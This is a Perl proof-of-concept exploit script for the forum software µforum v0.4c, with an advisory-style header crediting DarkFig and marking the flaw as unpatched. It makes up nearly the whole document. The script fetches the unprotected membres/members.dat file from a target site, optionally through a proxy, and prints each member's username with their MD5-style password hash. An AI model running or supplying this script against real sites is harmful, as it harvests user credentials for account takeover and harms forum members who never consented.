#!/usr/bin/perl # # Affected.scr..: µforum v0.4c # Poc.ID........: 08060901 # Type..........: Member's passwords are stored in .dat file no protected by a .htaccess file # Risk.level....: Medium # Vendor.Status.: Unpatched # Src.download..: comscripts.com/scripts/php.forum.1568.html # Poc.link......: acid-root.new.fr/poc/08060901.txt # Credits.......: DarkFig # use LWP::UserAgent; use HTTP::Request::Common; use Getopt::Long; use strict; print STDOUT "\n+", '-' x 53, "+\n"; print STDOUT "| µforum v0.4c (members.dat) Exploit |\n"; print STDOUT '+', '-' x 53, "+\n"; my($host,$path,$proxh,$proxu,$proxp,$req); my $opt = GetOptions( 'host=s' => \$host, 'path=s' => \$path, 'proxh=s' => \$proxh, 'proxu=s' => \$proxu, 'proxp=s' => \$proxp); if(!$host) { print STDOUT "| Usage: ./xx.pl --host=[www] --path=[/] [Options] |\n"; print STDOUT "| [Options] --proxh=[ip] --proxu=[user] --proxp=[pwd] |\n"; print STDOUT '+', '-' x 53, "+\n"; exit(1); } if(!$path) {$path = '/';} $host .= $path.'membres/members.dat'; if($host !~ /http/) {$host = 'http://'.$host;} my $ua = LWP::UserAgent->new(); $ua->agent('Mozilla'); $ua->timeout(30); $ua->proxy(['http'] => $proxh) if $proxh; $req->proxy_authorization_basic($proxu, $proxp) if $proxp; $req = GET $host; $req = $ua->request($req); my $dat = $req->content; my @tabl= split(/:/, $dat); foreach (@tabl) { if($_ =~ /"(.*)";a/){ print STDOUT "\n".$1.'::';} if($_ =~ /"([a-z0-9]{32})";i/){ print STDOUT $1;} } print "\n"; exit(0);